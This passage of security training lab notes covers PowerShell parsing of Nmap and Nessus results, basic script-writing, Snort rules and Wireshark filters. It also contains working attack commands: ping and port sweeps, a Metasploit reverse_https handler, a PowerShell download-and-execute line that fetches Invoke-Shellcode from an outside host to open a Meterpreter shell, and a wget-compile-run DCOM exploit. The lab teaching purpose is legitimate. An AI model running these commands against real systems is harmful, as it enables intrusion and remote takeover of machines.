4790$socket = $NULL;
4791}}
4792---------------------------------------------------------------
4793
4794
4795
4796
4797##########################
4798# Parsing Nmap XML Files #
4799##########################
4800If you are NOT using the Win7 VM provided then you can get the required files for this lab which are located in this zip file:
4801https://s3.amazonaws.com/infosecaddictsfiles/PowerShell-Files.zip
4802
4803
4804
4805
4806Run Powershell as administrator
4807------------------------Type This------------------------------
4808cd C:\
4809
4810Get-ExecutionPolicy
4811Set-ExecutionPolicy Unrestricted –Force
4812---------------------------------------------------------------
4813
4814
4815Parse nmap XML
4816------------------------Type This------------------------------
4817.\parse-nmap.ps1 samplescan.xml
4818---------------------------------------------------------------
4819
4820
4821Process all XML files
4822------------------------Type This------------------------------
4823.\parse-nmap.ps1 *.xml
4824---------------------------------------------------------------
4825
4826Piping also works
4827------------------------Type This------------------------------
4828dir *.xml | .\parse-nmap.ps1
4829---------------------------------------------------------------
4830
4831Advanced parsing with filtering conditions
4832------------------------Type This------------------------------
4833.\parse-nmap.ps1 samplescan.xml | where {$_.OS -like "*Windows XP*"} | format-table IPv4,HostName,OS
4834---------------------------------------------------------------
4835
4836
4837More parsing
4838------------------------Type This------------------------------
4839.\parse-nmap.ps1 samplescan.xml | where {$_.Ports -like "*open:tcp:22*"}
4840---------------------------------------------------------------
4841
4842Parsing with match and multiple conditions
4843------------------------Type This------------------------------
4844.\parse-nmap.ps1 samplescan.xml |where {$_.Ports -match "open:tcp:80|open:tcp:443"}
4845---------------------------------------------------------------
4846
4847
4848CSV Export
4849------------------------Type This------------------------------
4850.\parse-nmap.ps1 samplescan.xml -outputdelimiter " " | where {$_.Ports -match "open:tcp:80"} | export-csv weblisteners.csv
4851---------------------------------------------------------------
4852
4853Import Data from CSV
4854------------------------Type This------------------------------
4855$data = import-csv weblisteners.csv
4856$data | where {($_.IPv4 -like "10.57.*") -and ($_.Ports -match "open:tcp:22")}
4857---------------------------------------------------------------
4858
4859
4860Export to HTML
4861------------------------Type This------------------------------
4862.\parse-nmap.ps1 samplescan.xml -outputdelimiter " " |select-object IPv4,HostName,OS | ConvertTo-Html | out-file report.html
4863---------------------------------------------------------------
4864
4865
4866########################################
4867# Parsing Nessus scans with PowerShell #
4868########################################
4869If you are NOT using the Win7 VM provided then you can get the required files for this lab which are located in this zip file:
4870https://s3.amazonaws.com/infosecaddictsfiles/PowerShell-Files.zip
4871
4872
4873
4874Let's take a look at the Import-Csv cmdlet and what are the members of the object it returns:
4875------------------------Type This------------------------------
4876Import-Csv C:\class_nessus.csv | Get-Member
4877---------------------------------------------------------------
4878
4879filter the objects:
4880
4881------------------------Type This------------------------------
4882Import-Csv C:\class_nessus.csv | where {$_.risk -eq "high"}
4883---------------------------------------------------------------
4884
4885use the Select-Object cmdlet and only get unique entries:
4886------------------------Type This------------------------------
4887Import-Csv C:\class_nessus.csv | where {$_.risk -eq "high"} | select host -Unique
4888
4889Import-Csv C:\class_nessus.csv | where {"high","medium","low" -contains $_.risk} | select "Plugin ID", CVE, CVSS, Risk, Host, Protocol, Port, Name | Out-GridView
4890------------------------Type This------------------------------
4891
4892ConvertTo-Html cmdlet and turn it in to an HTML report in list format:
4893------------------------Type This------------------------------
4894Import-Csv C:\class_nessus.csv | where {"high","medium","low" -contains $_.risk} | select "Plugin ID", CVE, CVSS, Risk, Host, Protocol, Port, Name | ConvertTo-Html -As List > C:\report2.html
4895---------------------------------------------------------------
4896
4897
4898
4899
4900
4901
4902############################################
4903# Introduction to scripting and toolmaking #
4904############################################
4905https://www.youtube.com/watch?v=usiqXcWb978
4906
4907Start the ISE
4908
4909
4910CTRL+R
4911
4912
4913
4914
4915
4916
4917
4918
4919Get-EventLog -LogName application
4920
4921
4922------------------------------------------------------------------------------------------------
4923--- Now run the script ---
4924
4925---------------------------Type This-----------------------------------
4926
4927.\GrabLogs.ps1
4928
4929
4930------------------------------------------------------------------------------------------------
4931
4932
4933
4934$LogName="application"
4935Get-EventLog -LogName $LogName | Export-Clixml C:\Users\Workshop\Desktop\Scripts\$LogName.xml
4936
4937
4938
4939
4940--- Now run the script ---
4941
4942---------------------------Type This-----------------------------------
4943
4944.\GrabLogs.ps1
4945
4946
4947------------------------------------------------------------------------------------------------
4948
4949
4950param(
4951 $LogName="application"
4952)
4953Get-EventLog -LogName $LogName | Export-Clixml C:\Users\Workshop\Desktop\Scripts\$LogName.xml
4954
4955
4956
4957--- Now run the script ---
4958
4959.\GrabLogs.ps1
4960
4961
4962------------------------------------------------------------------------------------------------
4963--- Now run the script ---
4964
4965.\GrabLogs.ps1 -L[ TAB Key ]
4966
4967.\GrabLogs.ps1 -LogName (you should now see LogName spelled out)
4968
4969
4970.\GrabLogs.ps1 -LogName system
4971
4972
4973------------------------------------------------------------------------------------------------
4974
4975
4976
4977param(
4978 $LogName="application",
4979 $Quantico
4980)
4981Get-EventLog -LogName $LogName | Export-Clixml C:\Users\Workshop\Desktop\Scripts\$LogName.xml
4982
4983
4984
4985------------------------------------------------------------------------------------------------
4986--- Now run the script ---
4987
4988.\GrabLogs.ps1 -Q[ TAB Key ]
4989
4990.\GrabLogs.ps1 -Quantico (you should now see Quantico spelled out)
4991
4992
4993
4994
4995------------------------------------------------------------------------------------------------
4996--- Now get help on the script ---
4997
4998get-help .\GrabLogs.ps1
4999GrabLogs.ps1 [[-LogName] <Object>] [[-Quantico] <Object>]
5000
5001
5002
5003
5004------------------------------------------------------------------------------------------------
5005param(
5006 [string]$LogName="application",
5007 $Quantico
5008)
5009Get-EventLog -LogName $LogName | Export-Clixml C:\Users\Workshop\Desktop\Scripts\$LogName.xml
5010
5011
5012
5013------------------------------------------------------------------------------------------------
5014--- Now get help on the script ---
5015
5016get-help .\GrabLogs.ps1
5017GrabLogs.ps1 [[-LogName] <String>] [[-Quantico] <Object>]
5018
5019
5020
5021
5022------------------------------------------------------------------------------------------------
5023param(
5024 [string[]]$LogName="application",
5025 $Quantico
5026)
5027Get-EventLog -LogName $LogName | Export-Clixml C:\Users\Workshop\Desktop\Scripts\$LogName.xml
5028
5029
5030
5031------------------------------------------------------------------------------------------------
5032--- Now get help on the script ---
5033
5034get-help .\GrabLogs.ps1
5035GrabLogs.ps1 [[-LogName] <String[]>] [[-Quantico] <Object>]
5036
5037
5038
5039------------------------------------------------------------------------------------------------
5040[CmdletBinding()]
5041param(
5042 [Parameter(Mandatory=$True)]
5043 $LogName
5044)
5045Get-EventLog -LogName $LogName | Export-Clixml C:\Users\Workshop\Desktop\Scripts\$LogName.xml
5046
5047
5048
5049------------------------------------------------------------------------------------------------
5050--- Now run the script ---
5051
5052.\GrabLogs.ps1
5053
5054
5055
5056
5057
5058------------------------------------------------------------------------------------------------
5059[CmdletBinding()]
5060param(
5061 [Parameter(Mandatory=$True)]
5062 $LogName
5063)
5064Get-EventLog -LogName $LogName | Export-Clixml C:\Users\Workshop\Desktop\Scripts\$LogName.xml
5065
5066
5067
5068
5069
5070------------------------------------------------------------------------------------------------
5071<#
5072
5073.Synopsis
5074This is a just a short explantion of the script
5075
5076.Description
5077This is where provide a more information about how to use the script
5078
5079.Parameter LogName
5080This is where you specify the names of different logs
5081
5082./Syntax
5083GrabLogs.psl -LogName security
5084
5085
5086.Example
5087GrabLogs.psl -LogName security
5088
5089
5090#>
5091[CmdletBinding()]
5092param(
5093 [Parameter(Mandatory=$True)]
5094 $LogName
5095)
5096Get-EventLog -LogName $LogName | Export-Clixml C:\Users\Workshop\Desktop\Scripts\$LogName.xml
5097
5098
5099
5100
5101------------------------------------------------------------------------------------------------
5102--- Now get help on the script ---
5103
5104get-help .\GrabLogs.ps1
5105
5106
5107
5108
5109
5110
5111------------------------------------------------------------------------------------------------
5112--- Now get help on the script ---
5113get-help .\GrabLogs.ps1 -full
5114
5115
5116
5117
5118
5119
5120
5121<#
5122
5123.Synopsis
5124This is a just a short explantion of the script
5125
5126.Description
5127This is where provide a more information about how to use the script
5128
5129.Parameter LogName
5130This is where you specify the names of different logs
5131
5132./Syntax
5133GrabLogs.psl -LogName security
5134
5135
5136.Example
5137GrabLogs.psl -LogName security
5138
5139
5140#>
5141function Get-GrabLogs{
5142 [CmdletBinding()]
5143 param(
5144 [Parameter(Mandatory=$True)]
5145 $LogName
5146 )
5147 Get-EventLog -LogName $LogName | Export-Clixml C:\Users\Workshop\Desktop\Scripts\$LogName.xml
5148}
5149
5150####################################################
5151# Running Powershell From A Command Prompt #
5152# Using Powersploit & Nishang #
5153####################################################
5154
5155COMMAND & 1 PARAMATER SYNTAX:
5156 powershell -command "& {&'some-command' someParam}"
5157
5158
5159
5160MULTIPLE COMMAND & PARAMETER SYNTAX
5161 powershell -command "& {&'some-command' someParam}"; "& {&'some-command' -SpecificArg someParam}"
5162
5163
5164
5165Tools to download to the web root (/var/www) of your infosecaddicts-Ubuntu-VM:
5166git clone https://github.com/mattifestation/PowerSploit.git
5167git clone https://github.com/samratashok/nishang
5168
5169from the infosecaddicts home dir copy nc.exe to /var/www/ folder
5170
5171user:infosecaddicts
5172pass:infosecaddicts
5173
5174------------------------Type This------------------------------
5175cd ~
5176sudo cp nc.exe /var/www/
5177
5178cd /var/www/html/
5179sudo git clone https://github.com/samratashok/nishang
5180sudo git clone https://github.com/mattifestation/PowerSploit
5181
5182
5183********************************** Simple Ping Sweep **********************************
5184powershell -command "50..100 | % {\""192.168.150.$($_): $(Test-Connection -count 1 -comp 192.168.150.$($_) -quiet)\""}"
5185
5186
5187
5188
5189
5190********************************** Simple Port 445 Sweep **********************************
5191powershell -command "1..255 | % { echo ((new-object Net.Sockets.TcpClient).Connect(\""192.168.150.$_\"",445)) \""192.168.150.$_\""} 2>$null"
5192
5193
5194
5195
5196
5197
5198********************************** Simple Port Scan **********************************
5199powershell -command "1..1024 | % { echo ((new-object Net.Sockets.TcpClient).Connect(\""192.168.150.XX\"",$_)) \""$_ is open\""} 2>$null"
5200
5201
5202
5203
5204
5205
5206********************************** Powershell Download & Execute Reverse Meterpreter **********************************
5207from ubuntu host browse to metasploit folder
5208cd ~/toolz/metasploit/
5209
5210sudo ./msfconsole
5211use exploit/multi/handler
5212set ExitOnSession false
5213set payload windows/meterpreter/reverse_https
5214set LHOST 192.168.150.129
5215set LPORT 4443
5216set EXITFUNC thread
5217exploit -j
5218
5219
5220
5221powershell -command "IEX (New-Object Net.WebClient).DownloadString('https://s3.amazonaws.com/infosecaddictsfiles/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.150.129 -Lport 4443 -Force"
5222
5223
5224
5225
5226
5227
5228
5229#############################
5230# Understanding Snort rules #
5231#############################
5232Field 1: Action - Snort can process events in 1 of 3 ways (alert, log, drop)
5233
5234Field 2: Protocol - Snort understands a few types of traffic (tcp, udp, icmp)
5235
5236Field 3: Source IP (can be a variable like $External_Net, or an IP, or a range)
5237
5238Field 4: Source Port (can be a variable like $WebServer_Ports, or a port number, or a range of ports)
5239
5240Field 5: Traffic Direction (->)
5241
5242Field 6: Destination IP (can be a variable like $External_Net, or an IP, or a range)
5243
5244Field 7: Destination Port (can be a variable like $WebServer_Ports, or a port number, or a range of ports)
5245
5246Field 8: MSG - what is actually displayed on the analysts machine
5247
5248
5249Let's look at 2 simple rules
5250----------------------------------------------------------------------------------
5251alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:”NETBIOS DCERPC ISystemActivator \
5252bind attempt”; flow:to_server,established; content:”|05|”; distance:0; within:1; \
5253content:”|0b|”; distance:1; within:1; byte_test:1,&,1,0,relative; content:”|A0 01 00 \
525400 00 00 00 00 C0 00 00 00 00 00 00 46|”; distance:29; within:16; \
5255reference:cve,CAN-2003-0352; classtype:attempted-admin; sid:2192; rev:1;)
5256
5257alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:”NETBIOS SMB DCERPC ISystemActivator bind \
5258attempt”; flow:to_server,established; content:”|FF|SMB|25|”; nocase; offset:4; \
5259depth:5; content:”|26 00|”; distance:56; within:2; content:”|5c \
526000|P|00|I|00|P|00|E|00 5c 00|”; nocase; distance:5; within:12; content:”|05|”; \
5261distance:0; within:1; content:”|0b|”; distance:1; within:1; \
5262byte_test:1,&,1,0,relative; content:”|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 \
526346|”; distance:29; within:16; reference:cve,CAN-2003-0352; classtype:attempted-admin; \
5264sid:2193; rev:1;)
5265----------------------------------------------------------------------------------
5266
5267
5268
5269From your Linux machine ping your Windows machine
5270ping 192.168.150.1
5271
5272
5273
5274Start wireshark and let's create some simple filters:
5275
5276Filter 1:
5277ip.addr==192.168.150.1
5278
5279
5280Filter 2:
5281ip.addr==192.168.150.1 && icmp
5282
5283
5284
5285Filter 3:
5286ip.addr==192.168.150.1 && !(tcp.port==22)
5287
5288Now stop your capture and restart it (make sure you keep the filter)
5289
5290
5291
5292
5293Back to your Linux machine:
5294[ CTRL-C ] - to stop your ping
5295
5296wget http://downloads.securityfocus.com/vulnerabilities/exploits/oc192-dcom.c
5297
5298
5299gcc -o exploit oc192-dcom.c
5300
5301./exploit
5302
5303
5304./exploit -d 192.168.150.1 -t 0
5305
5306
5307
5308
5309Now go back to WireShark and stop the capture.